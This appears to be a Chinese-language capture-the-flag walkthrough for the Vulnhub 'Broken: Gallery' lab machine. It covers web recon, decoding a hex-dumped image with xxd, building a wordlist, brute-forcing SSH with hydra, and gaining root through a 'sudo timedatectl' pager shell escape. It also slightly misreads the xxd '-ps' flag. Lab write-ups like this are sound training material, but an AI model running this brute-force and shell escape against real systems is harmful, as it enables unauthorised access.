【Vulnhub】Broken_Gallery_Tip

前期

靶机地址: https://www.vulnhub.com/entry/broken-gallery,344/

信息收集

端口探测
22、80

80端口

收集网页信息无有用信息
目录爆破也并没有什么有用信息

wget递归下载到本地

wget --recursive --no-parent http://192.168.87.134/

收集图片上的信息

REAMD.md的文件内容都是十六进制的字节码

xxd -r -ps README.md > README.bin

xxd: 建立一个指定文件或者标准输入的十六进制转储,同时也可以 把十六进制转储转换成原来的二进制形式。同 uuencode(1)uudecode(1) 一样,它也可以把二进制数据转换成 ASCII 表示形式,这样电子邮件就可以 安全的传输。但是它有一个优点,就是可以把解码后的结果输出到 标准输出。同时它还可以用来给二进制文件打补丁。安装vim即可安装该工具。
-r 用于将十六进制格式转换回二进制格式
-p 表示输出纯粹的十六进制编码,而不包括其他信息
-s 用于跳过文件的前N个字节

strings README.bin | head -n 10

strings: 用于从二进制文件中提取可打印的ASCII字符串。它通常用于查看二进制文件中的文本内容。

可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开,是一段文字信息

用exiftool 查看图片信息,没有发现有隐藏的信息

exiftool *.jpg

22端口渗透

根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH

avahamcohen.ac
hello
bob
broken
cheers
hydra -L info.txt -P info.txt ssh://192.168.87.134

提权

GTFOBins 查询 sudo 提权信息

sudo -l
sudo timedatectl list-timezones
!/bin/sh

参考

Broken: Gallery Vulnhub Walkthrough-CSDN博客